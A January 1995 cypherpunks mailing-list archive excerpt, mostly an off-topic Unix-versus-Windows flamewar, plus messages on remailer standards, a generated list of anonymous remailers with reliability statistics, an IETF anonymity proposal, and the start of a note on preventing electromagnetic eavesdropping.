From: Michael Sattler <msattler@jungle.com>
Date: Sun, 29 Jan 95 22:45:22 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
Message-ID: <v03001109ab523a0cd3f8@[140.174.229.228]>
MIME-Version: 1.0
Content-Type: text/plain


Perhaps it's just me, but I thought the header that was substituted a few
days ago was designed to be a subtle hit to the flamers.  Since it seems
not to have worked, allow me to be a bit more explicit.

HEY, MORONS!  THIS IS AN ASSEMBLAGE OF PERSONS INTERESTED IN THE
FURTHERANCE OF CRYPTOGRPAHY.  While it is true that to persons not familiar
with a particular operating system, it may appear cryptic, this really
isn't what cryptography is all about.  TAKE IT ELSEWHERE!

Thank you.  Have a nice day.  Teco rules!

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Sun, 29 Jan 95 22:48:35 PST
To: cypherpunks@toad.com
Subject: UNIX bashing?
Message-ID: <199501300647.WAA00604@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>Microsoft hasn't really made any attempt to enbrace the UNIX community.
>Why should we embrace Microsoft?

Gravity has made no attempt to embrace me, why should I embrace gravity? 
Because it's a force-of-nature bigger than any of us.  It's not a matter 
of embracing (or not embracing), it's a matter of recognizing the 
obvious.  

Also, just as an historical note, the offical internal policy at 
Microsoft until about 1986-7 was that DOS was a stopgap measure that 
would eventually be replaced by a 16-bit version of Xenix (M/S's 
proprietary Unix variant) that would ship with the 286 based systems. It 
was the MARKET's rejection of Xenix that forced Microsoft to reluctantly 
look towards OS/2 and Windows rather than Unix as its future flagship 
OS.  Again, this has nothing to do with Unix's obvious technical merits, 
but the triumph of social, market and economic forces over technical 
forces.  Look at the fact that the existing global code-base consists 
overwhelmingly of Cobol closely followed by dBase with C/C++ trailing 
way down in the noise.  The realworld is a messy and complex place.

Dale H.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mikepb@freke.lerctr.org (Michael P. Brininstool)
Date: Sun, 29 Jan 95 15:31:48 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Specs
In-Reply-To: <Pine.SUN.3.91.950128194321.1158A-100000@unix2.netaxs.com>
Message-ID: <1995Jan29.153057.11745@freke.lerctr.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SUN.3.91.950128194321.1158A-100000@unix2.netaxs.com> grendel@netaxs.com (Michael Handler) writes:
>On Sat, 28 Jan 1995, Rhys Kyraden wrote:
>
>>         Since I have begun the project of writing the Remailer for the Mac,
>> I suddenly realized that I do not know exactly what is expected of it, and
>> therefore would like some pointers to the specs of a remailer (I have seen
>> references to padding and splitting but do not know what this is nor how to
>> implement it.)
>
>	I've started work on a formal remailer standards document that 
>describes just how a Cypherpunk Type I remailer should process messages, 
>with full header descriptions, etc. After I've checked it against the 
>behaviors of all the various Cypherpunk remailer packages (Ghio vs Eric 
>Hollander vs Sameer vs Mixmaster in compatibility mode vs whatever else), 
>I'll post it here for comments.

Cypherpunk Type I?  Ok, what are the other types?  Should there be a
type specification like there is for RAID, or the Body Armor Threat
levels?

I would like to try my hand at writing a remailer, but I would like to
see standards, and level/type specifications.

E.g. The body armor threat levels are I - VI
VI is able to physically stop a 50 BMG round, i.e. prevent
penetration.  The wearer of the armor would likely die from the shock,
but would not be penetrated.  Level II includes all the abilites of
level I and then some, III = II + some more, etc until VI which is
all of the abilities in body armor.

I believe that RAID levels are 1-5, and I seem to remember that it is
graduated like the body armor threat levels, so that 2=1 + some stuff,
4=3 + some stuff, etc.

Should we come up with a similar type of graduated system, and specs
for each, with some kind of negotiation between remailers, so that they
can determine what levels to use to communicate with various
remailers?

Then we could talk in terms of type 6, for example, having all the
abilities of levels 1-5 and then some.

---------------------------------------------------------|
| #include "std/disclaimer.h"     Michael P. Brininstool |
| mikepb@freke.lerctr.org      OR      mikepb@netcom.com |
|---------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Date: Sun, 29 Jan 95 20:38:39 PST
To: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Subject: UNIX bashing?
In-Reply-To: <199501300427.UAA21533@ix3.ix.netcom.com>
Message-ID: <9501300437.AA20704@hawksbill.sprintmrn.com>
MIME-Version: 1.0
Content-Type: text



> 
> I don't mean to toss gasoline onto this fire, but......
>

Too late...

 
> Unix as we know has a vanishingly small probability of ever becoming 
> 'mainstream'. There's a two-orders-of-magnitude gap between the installed 
> base of Dos/Windows and that of Unix. That gap has grown, not marrowed 
> over time. This is however no reflection on the obvious technical merits 
> of Unix. Market dominance is based not on technical superiority, but 
> rather on technical sufficiency. Once an OS acheives technical 
> sufficiency any further technical improvements will have a diminishing 
> marginal effect on that OS's market performance. Once the OS is 
> technically sufficient, non-technical factors begin to dominate. The 
> market failure of WinNT is a classic example of this. Its failure is 
> unrelated to its technical merits (or lack thereof), but rather on 
> econmic and social factors the even a company withe the marketing muscle 
> of MicroSoft has not yet been able to overcome. (OS/2 is of course an 
> example of an even more dismal, perhaps terminal, failure for many of the 
> same reasons.)
>


UNIX is a _networking_ OS, in my mind, above and beyond anything else
which the 'mainstream' may desire.

If I want Excel, Word or Powerpoint, I'll use my PC (which is completely
compatible, via PPP, and able to exchange data) to work within these
obviously proprietary formats. :-)

Microsoft hasn't really made any attempt to enbrace the UNIX community.

Why should we emmrace Microsoft?

- paul

 
_______________________________________________________________________________
Paul Ferguson                         
US Sprint                                          tel: 703.689.6828
Managed Network Engineering                   internet: paul@hawk.sprintmrn.com
Reston, Virginia  USA                             http://www.sprintmrn.com 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spif <c642011@cclabs.missouri.edu>
Date: Sun, 29 Jan 95 21:55:47 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300522.VAA17151@jobe.shell.portal.com>
Message-ID: <Pine.SGI.3.91.950129233454.3652G-100000@sgi7.phlab.missouri.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995 anonymous-remailer@shell.portal.com wrote:

> Spif wrote:
> >UNIX?  user hostile?  where have you been lately?  
> 
> Well, maybe unix gets its reputation for being hostile because of
> things like 
> 
> * many commands don't work fully (find, for example)

find works just fine for me...  there's also "whereis", in case you 
didn't know...

> * a large portion choke on input that isn't "expected"

so it give it "expected" input...  since when does DOS like "unexpected" 
input, anyhow?

> * many more do extremely poor input checking,

could we see an example of this?  I have yet to find one.

> * the configuration files are bizarre

again, provide an example.  again, I have yet to see one.

> * different version have command with different options (stty
>   everything, ps -ef vs. ps -aux, etc.)

different operating systems have differences...  the differences between 
IBM PC-DOS and MS-DOS are a good example.

> * each version is slightly different (ever try porting a non-trivial
>   program?  Look at some available large software and examine the #ifdef
>   #define #endif statements; look at the differences in system calls.
>   Hell, look at the "config" program that comes with PERL - 80K of stuff
>   to build a make file for the flavor of UNIX you are using!)

again, different OSes are different...  you don't expect every company to 
make the same UNIX, do you?  what point would there be in cloning each 
other?

> * the commands don't combine well (often uuencode + sendmail ==
>   garbage)

I've never encountered this...  perhaps because I uuencode things and 
THEN send them rather than trying to pipe a uuencode into mail.

> * many commands accept a slightly different regular expression syntax
>   than the shell does

again, does DOS *not* do this?  

> * the commands aren't built with ease of use in mind.  For example, to
>   kill a process under unix requires that I know it's process id.  How
>   do I find that?  Run another command...

at least UNIX gives you the option of killing a process in the first 
place...  I can remember having to reboot DOS and fiddling with multiple 
configuration hassles just to clear a device driver out in order to solve 
an incompability problem with another program.

> > ever hear of X windows?
> 
> X-Windows is an extreme pain to get working.  Sure, if you buy your
> unix workstation the manufacturer will pre-install it.  Just try
> setting it up from scratch.

I've done it.  Several times.  Within minutes, each time.  And I'm not a 
guru, either.  And, as you've pointed out, I wouldn't have had to do even 
that if I was working with an already-setup system.

    Bryan Venable               | c642011@cclabs.missouri.edu
    Student & MOO Administrator | wlspif@showme.missouri.edu
    U of Missouri - Columbia    | spif@pobox.com
    SGI/Netscape/MOO addict     | spif@m-net.arbornet.org
    Spif or Turmandir @ MOOs    | http://www.phlab.missouri.edu/~c642011 

             <insert standard university disclaimer here>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spif <c642011@cclabs.missouri.edu>
Date: Sun, 29 Jan 95 22:08:25 PST
To: anonymous-remailer@shell.portal.com
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300539.VAA18044@jobe.shell.portal.com>
Message-ID: <Pine.SGI.3.91.950129235548.3652H-100000@sgi7.phlab.missouri.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995 anonymous-remailer@shell.portal.com wrote:

> Spif wrote:
> >so your point, basically, is that the public will settle for whatever it 
> >can get, and get easiest and cheapest, when it comes to software and 
> >operating systems in particular.  
> 
> It always puzzles me that people on the net spend so much time griping
> about Microsoft when the net tends towards libertarianism.  I would
> think libertarians would welcome Microsoft's dominance, as a
> validation of the free market in action.

I don't think supporting the free market has anything to do with 
supporting bad products.  I separate my ideological views from my 
technical opinions, quite frankly.  In addition, when did I single out 
Microsoft?  IBM and Apple make plenty of crappy products, which is ironic 
since they also make UNIX products that are technically superior and 
should probably be the de facto operating systems for their high-end 
machines (in fact, in IBM's case, they are - AIX is the default OS on rs6000 
machines).

> "Dos/Windows + applications available for Dos/Windows" are obviously
> blowing out "unix + applications available for unix".

that depends on what applications you're talking about...  if you mean 
Word Processors, Spreadsheets, and (perhaps) games, then I'd have to 
agree.  If you're talking about programming environments/tools, graphical 
interfaces, networking software, graphic design software, or file server 
applications, not to mention at least a few other categories, I'd have to 
disagree strongly.

> Normal people don't give a damn if source code is available for "power
> tools" like PERL, sed, grep, wc, bc, strip, yacc, lex, puke, barf,
> etc.

so UNIX users aren't "normal" now, eh?  by what standard do you define 
normal?  

> >certainly a growing market for internet-capable systems
> 
> OS/2 is internet friendly, Windows 95 will be friendly, etc.
> Certainly unix will let you do more, but most people won't care about
> the value of the extras, as long as a web browser, news reader, and
> mail reader is available.

we're talking about both client AND server applications here, as well as 
the robustness of the multitasking/threading capabilities of the OS they 
run on.  when surfing the net, it's best not to have your news reader 
choke because your web browser needs more resources.

> Some people on this list swear they never have to drop to a command
> line with the cool tools they use with their SLIP accounts (except to
> change their password).  If that's true, then any "advantage" unix has
> is washed away.  How will the unix market grow (relative to other more
> popular OS's) if internet access tools run the same on Windows and
> OS/2 and Mac's as they do on unix?

simple - they never will run the same, and they definitely won't run 
better, unless of course they are morphed into UNIX...  and I wouldn't be 
surprised if they do.  I see a day sometime not too far into the future 
when Windows, OS/2, and their kin either vanish completely or at least as 
non-UNIX operating systems, and are replaced with look-alike UNIX 
flavours with commercial app support.  if Microsoft, IBM, and/or Apple 
have the guts, that is.

    Bryan Venable               | c642011@cclabs.missouri.edu
    Student & MOO Administrator | wlspif@showme.missouri.edu
    U of Missouri - Columbia    | spif@pobox.com
    SGI/Netscape/MOO addict     | spif@m-net.arbornet.org
    Spif or Turmandir @ MOOs    | http://www.phlab.missouri.edu/~c642011 

             <insert standard university disclaimer here>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Mon, 30 Jan 95 00:08:27 PST
To: rishab@dxm.ernet.in
Subject: Re: PFF's Magna Carta and the new netserfs
In-Reply-To: <gate.ywRkZc1w165w@dxm.ernet.in>
Message-ID: <m0rYr8r-0004IhC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> I've never figured out why governments are made out to be so bad; guns, ok,
> but the problems of privacy we face on this list have little to do with that.
> Corporations can be at least as bad - extreme government leads to socialism,
> which often retains some form of citizen-participation in decision-making;
> the corporate state, though, is exemplified in fascism, inherently much less
> concerned about citizen's rights.

Extreme government leads to totalitarianism, not socialism.

Governments as a whole are seen to be "bad" because they invariably undermine
the right of the individual to make choices for themselves.

> As many of us have argued, in what is sometimes called a 'post-capitalist'
> economy, (intellectual) property rights will not be enforceable. They may

And why should they?  After all, property rights are founded on a belief in
scarcity, which is a total fear-based illusion.

> be respected often - but then that requires no laws; after all no one had
> tried to rob Phil Zimmerman of his (only recently trademarked) 'PGP'. Those
> who depend too much on enforced rights will not survive. I've discussed in
> my column, Electric Dreams, and on this list the shift in economic structure
> that will have to take place - cooking-pot markets, knowledge exchanges etc;
> concept patents enforced by net.cops are most certainly 'Second Wave thinking!'

And there are certain areas of society that this scares, and who are already
making steps to stop it and clamp down. Where do you think all the scare
stories about "kiddie porn" and such on the net are coming from?

> > This said, it is essential that we understand what it really means 
> > to create a Third Wave government and begin the process of transformation.
> 
> 'Third Wave' is such a lovely phrase that it is all too easy to hand wave 
> opposing beliefs and concerns - "that's Second Wave thinking." Reminds me of 
> the Freudian defense against Jung - "Ah, Jung was sexually repressed as an 
> infant and therefore jealous of his mentor's open emphasis on id..." - 
> solipsism is great for argument, but does little to elicit the truth.

The so-called "Third Wave" has nothing to do with government and everything to
do with the empowerment of the individual.  Some seem to not recognize that.

> > [  There you have it. The American Dream and frontier
> > [  competitiveness lead us inevitably to the following
> > [  mandate for cyberspace:
> > [        (1) strong private property rights
> > [        (2) infrastructure to be owned by an
> > [            unregulated private monopoly
> > [        (3) investment to be written off rapidly
> 
> Those who remember their history will note that the original Magna Carta was
> not a pact that distributed power from a King to the people, but to a feudal
> nobility - the rest of us, netSERF on!

This has always been the case throughout history - the forces of dark, of
disinformation, have always attempted to keep true power from the hands of
the people.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spif <c642011@cclabs.missouri.edu>
Date: Sun, 29 Jan 95 23:56:12 PST
To: Dale Harrison <daleh@ix.netcom.com>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300630.WAA29275@ix2.ix.netcom.com>
Message-ID: <Pine.SGI.3.91.950130015104.9021B-100000@sgi15.phlab.missouri.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995, Dale Harrison wrote:

> >This may be the case, but there is certainly a growing market for 
> >internet-capable systems, and the most internet-friendly OS around is, 
> >of course, UNIX.  
> 
> OS/2 comes internet-ready and pre-installed and it's still an almost 
> complete failure in the market.

that depends on what you think of as "internet-ready", IMHO.  OS/2 is 
ready to fail in an endeavour to be what UNIX has been for over 25 
years:  a _truly_ internet-friendly, multitasking, multithreading OS.

> >In that fact, and in the growing importance of having an OS that 
> >utilizes the full capabilities of increasing powerful personal 
> >computers, lies the future of UNIX.
> 
> In any mature market, technical superiority above some baseline level of 
> sufficiency has no market value.  The auto market is a classic example 
> of this. Look how long tail-fins and chrome have dominated technical 
> superiority as the prime focus of marketing.  These are all marketing 
> issues not technical issues!

really?  I would think over a decade of Japanese technical superiority in 
automaking (better gas mileage, better safety features, etc.) and the 
resultant move by the "Big 3" to be even more technically superior would 
tend to contradict that notion.  Consumers are not totally stupid - they 
may drool over and rave about the latest flashy, technically inferior 
car, but when it comes down to it they'll most often buy the one with the 
best gas mileage, the best safety features, and so forth.

    Bryan Venable               | c642011@cclabs.missouri.edu
    Student & MOO Administrator | wlspif@showme.missouri.edu
    U of Missouri - Columbia    | spif@pobox.com
    SGI/Netscape/MOO addict     | spif@m-net.arbornet.org
    Spif or Turmandir @ MOOs    | http://www.phlab.missouri.edu/~c642011 

             <insert standard university disclaimer here>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sghahn@math1.kaist.ac.kr (han@joe.math.uga.edu)
Date: Mon, 30 Jan 95 02:01:22 PST
To: cypherpunks@toad.com
Subject: ECO_do
Message-ID: <199501300957.EAA11576@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLyy4ASoZzwIn1bdtAQF1bgF/QaMqHAsZVan936Z8M6n76hyPhwMpypzr
ijlcRqCv+c99aD19Y4NDGtWz/ES3dtpg
=bLFx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Name Withheld By Request <cs000rrs@selway.umt.edu>
Date: Mon, 30 Jan 95 05:38:10 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300522.VAA17151@jobe.shell.portal.com>
Message-ID: <Pine.ULT.3.91.950130063546.13138C-100000@selway.umt.edu>
MIME-Version: 1.0
Content-Type: text/plain



Does this stupid OS flamewar have *anything* to do with cypher? No.

Could it *PLEASE* be taken somewhere else?

Ryan Snyder, Consultant & Gopher Admin | "I've never seen a bigger group of
University of Montana                  | collectively angry, humorless, 
     -=>[Populus vult decipi!]<=-      | arrogant, bitter, gloomy-gus,
pinback@access.digex.net re:netizens--> FROWNY-FACED people in my whole life."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 30 Jan 95 06:49:55 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199501301450.GAA22193@kiwi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@204.95.228.28

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"soda"} = "<remailer@csua.berkeley.edu> eric post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"desert"} = "<remail@desert.xs4all.nl> cpunk pgp. post";
$remailer{"nately"} = "<remailer@nately.ucsd.edu> cpunk pgp hash latent cut";
$remailer{"myriad"} = "<remailer@myriad.pc.cc.cmu.edu> cpunk pgp hash latent cut ek";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"flame"} = "<tomaz@flame.sinet.org> cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash";
$remailer{"mix"} = "<mixmaster@nately.ucsd.edu> cpunk hash latent cut ek";
$remailer{"q"} = "<q@c2.org> cpunk hash latent cut ek";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp";
$remailer{"tower"} = "<remailer@tower.techwood.org> cpunk pgp";
$remailer{"eniac"} = "<vanklava@eniac.ac.siue.edu> cpunk pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.

Use "premail -getkeys remailer.help.all@204.95.228.28" as a stopgap to
get PGP keys for the remailer, at least until Matt Ghio gets his
machine situation straightened out. Fingering this address works too.

Last ping: Mon 30 Jan 95 6:00:01 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
syrinx   syrinx@c2.org                       #++-***      35:58  99.81%
rahul    homer@rahul.net                  * *-#**-*+**    39:27  99.37%
ideath   remailer@ideath.goldenbear.com   - ----------  1:51:37  99.36%
penet    anon@anon.penet.fi               +***++**+***    40:00  99.99%
alumni   hal@alumni.caltech.edu           - ***-*+****    12:45  99.34%
bsu-cs   nowhere@bsu-cs.bsu.edu           * *+*++***+      6:31  99.29%
eniac    vanklava@eniac.ac.siue.edu                #**     3:12  99.35%
tower    remailer@tower.techwood.org               ***     7:29  99.35%
soda     remailer@csua.berkeley.edu       . ......--    8:10:54  99.25%
portal   hfinney@shell.portal.com         - **#-*+***#     7:47  99.22%
nately   remailer@nately.ucsd.edu         +  ++----+++    54:21  99.20%
mix      mixmaster@nately.ucsd.edu        +  +++---*-+    59:50  99.20%
usura    usura@replay.com                 - -***-*+-**    42:10  98.85%
xs4all   remailer@xs4all.nl               + -***-**-*+    41:06  98.69%
myriad   remailer@myriad.pc.cc.cmu.edu      ***** +***    11:53  96.60%
vox      remail@vox.xs4all.nl               -----...   16:49:12  97.08%
c2       remail@c2.org                        ++-+++    6:15:30  94.44%
q        q@c2.org                         - +   ---+-   1:46:44  87.22%
flame    tomaz@flame.sinet.org            _  -+*# +***  1:56:36  86.57%
rebma    remailer@rebma.mn.org            -.-.-_-_.-   25:42:02  82.30%
desert   remail@desert.xs4all.nl          _______.-    78:19:21  42.42%
extropia remail@extropia.wimsey.com       . +++         5:04:09  34.35%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   Options and features

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.

   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.

   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.

   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.

   oldpgp
          Remailer does not like messages encoded with MIT PGP 2.6. Other
          versions of PGP, including 2.3a and 2.6ui, work fine.

   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.

   ksub
          Remailer always kills subject header, even in non-pgp mode.

   nsub
          Remailer always preserves subject header, even in pgp mode.

   latent
          Supports Matt Ghio's Latent-Time: option.

   cut
          Supports Matt Ghio's Cutmarks: option.

   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   special
          Accepts only pgp encrypted messages.

   ek
          Encrypt responses in relpy blocks using Encrypt-Key:
          header.


Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 30 Jan 95 06:07:58 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300522.VAA17151@jobe.shell.portal.com>
Message-ID: <9501301407.AA23479@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



I'd have replied in private mail, but Mr. Embarassing here can't be
reached by mail...

anonymous-remailer@shell.portal.com says:
> Well, maybe unix gets its reputation for being hostile because of
> things like 
> 
> * many commands don't work fully (find, for example)

Haven't found a bug in find since '85.

> * a large portion choke on input that isn't "expected"

Such as?

> * many more do extremely poor input checking,

Such as?

> * the configuration files are bizarre

Yup. Shell scripts as the startup scripts for the machine are really
hard to understand. The simple list of newsgroup names to configure
the news readers are impossible to grok, too. Not.

> * different version have command with different options (stty
>   everything, ps -ef vs. ps -aux, etc.)

And of course, DOS has never added options to new versions of the system.

> * each version is slightly different (ever try porting a non-trivial
>   program?

Yup. Recently, I ported about 80,000 lines of code in a day. It wasn't
much of a challenge -- because I knew how to program, of course. I had
to hack some compatibility libraries, and it took about another day
and a half to back-patch the original sources so that the program
compiled without problems on both architectures.

>   Hell, look at the "config" program that comes with PERL - 80K of stuff
>   to build a make file for the flavor of UNIX you are using!)

Thats because its fully automated. Would you prefer to do the job by hand?

Remember, Unix handles things that PCs never even dreamed of -- like
endianness considerations, which you don't get if you are chained by
the ankle to one shitty processor.

> * the commands don't combine well (often uuencode + sendmail ==
>   garbage)

I've never seen that, but then again I'm just on drugs. Naturally, of
course, no DOS programs have ever crapped out.

> * many commands accept a slightly different regular expression syntax
>   than the shell does

The shell doesn't accept regular expression syntax, so this shouldn't
be the least bit suprising.

> * the commands aren't built with ease of use in mind.  For example, to
>   kill a process under unix requires that I know it's process id.

Not at all true -- you can use skill, or if a process is a current job
you can do stuff in most shells like

kill %procname

> > ever hear of X windows?
> 
> X-Windows is an extreme pain to get working.  Sure, if you buy your
> unix workstation the manufacturer will pre-install it.  Just try
> setting it up from scratch.

So buy it precompiled. Lots of people sell it that way. I can't
imagine that Windows would be easy to install if you got it in source
form.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 30 Jan 95 06:09:57 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300539.VAA18044@jobe.shell.portal.com>
Message-ID: <9501301409.AA23487@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com says:
> Normal people don't give a damn if source code is available for "power
> tools" like PERL, sed, grep, wc, bc, strip, yacc, lex, puke, barf,
> etc.
> 
> They want to cut and paste their spreadsheet charts into the word
> processor they use, and email it to coworkers.

You can do that just fine under Unix. What decade are you living in?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 30 Jan 95 06:24:29 PST
To: cypherpunks@toad.com
Subject: Re: Anonymity by mechanism ?
Message-ID: <9501301420.AA06355@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


The IETF "common authentication technology" working group (the folks
behind GSSAPI and, now, basically, all application-level security
protocols on the Internet) are looking at providing first-class support
for anonymity.  Here's a reent message.

cat-ietf-request@mit.edu to join.
	/r$
---------- Begin Forwarded Message ----------
Message 173:
>From owner-cat-ietf@cam.ov.com Mon Jan 30 07:15:20 1995
Date: Mon, 30 Jan 1995 12:35:24 --100
From: danisch@ira.uka.de (Hadmut Danisch)
Message-Id: <9501301135.AA29078@elysion.iaks.ira.uka.de>
To: cat-ietf@mit.edu
Subject: Anonymity by mechanism ?
Content-Length: 1142
Status: R

Currently there is a discussion about providing anonymity. 

To avoid the problems of recognizing the name string syntax
for anonymous names and the necessity to implement the 
anonymous way into every gssapi mechanism I want to
propose the following:

- No anonymity within any gssapi mechanism except one
  special anonymous-only mechanism.

- Allow to use distinct authentication methods for
  both sides.

If an application accepts anonymous connections, it
uses the anonymous mechanism. If it accepts non-anonymous
connections also, it chooses both the anonymous and the
non-anonymous mechanism and asks for negotiation.

If only one peer wants to be anonymous, it can use the
anonymous mechanism and the other side a non-anonymous
mechanism (e.g. an ftp-server where the client wants to
be sure to be connected to the requested server).

This make programmers life easier and improves security:
A context is anonymous if and only if it was generated
by the anonymous mechanism. And the other mechanism don't have
to be extended for anonymity.

Anonymous mechanism doesn't mean no security. Just no
authentication of the peer.

Hadmut


----------- End Forwarded Message -----------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peb@netcom.com (Paul E. Baclace)
Date: Mon, 30 Jan 95 10:03:37 PST
To: cypherpunks@toad.com
Subject: How to TEMPEST for less
Message-ID: <199501301802.KAA04185@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Here is the article on EME reduction (a.k.a TEMPEST in a colloquial
sense). This is what you do after you encrypt your sensitive 
communications, use a crypto file system and shred, soak and
blend your sensitive papers before throwing them out...

Paul E. Baclace
peb@netcom.com

----------------------------------------
Preventing Electromagnetic Eavesdropping


---------
NOTE: Even though the author of this document uses the term "TEMPEST" at
      various points, he certifies that his text consists of general
      concepts to reduce electromagnetic emissions, and was not based on any
      actual TEMPEST specifications or data.  Further questions on this topic
      should be directed to the author, "grady@netcom.com".

				   -- PRIVACY Forum Moderator
---------


				Abstract

Eavesdropping on personal computers is not limited to looking over the
shoulder of the operator or physically tapping in to an Ethernet cable.
U.S. Government standards relating to the prevention of information capture
via the emission of electromagnetic radiation from computers and peripherals
are known as TEMPEST.  However, actual TEMPEST specifications are classified.
 
TEMPEST aside, there are inexpensive and easily applied means for
individuals to minimize unintentional emissions from equipment.  My document
"Preventing Electromagnetic Eavesdropping," discusses these techniques.

Grady Ward   <grady@netcom.com>

---------

Preventing Electromagnetic Eavesdropping

A note discussing the prevention of electromagnetic eavesdropping
of personal computers.

Grady Ward   <grady@netcom.com>
public key verification by PK server, finger, or by request

Version 1.0   22 March 93

TEMPEST is the code name for technology related to limiting unwanted
electromagnetic emissions from data processing and related equipment.
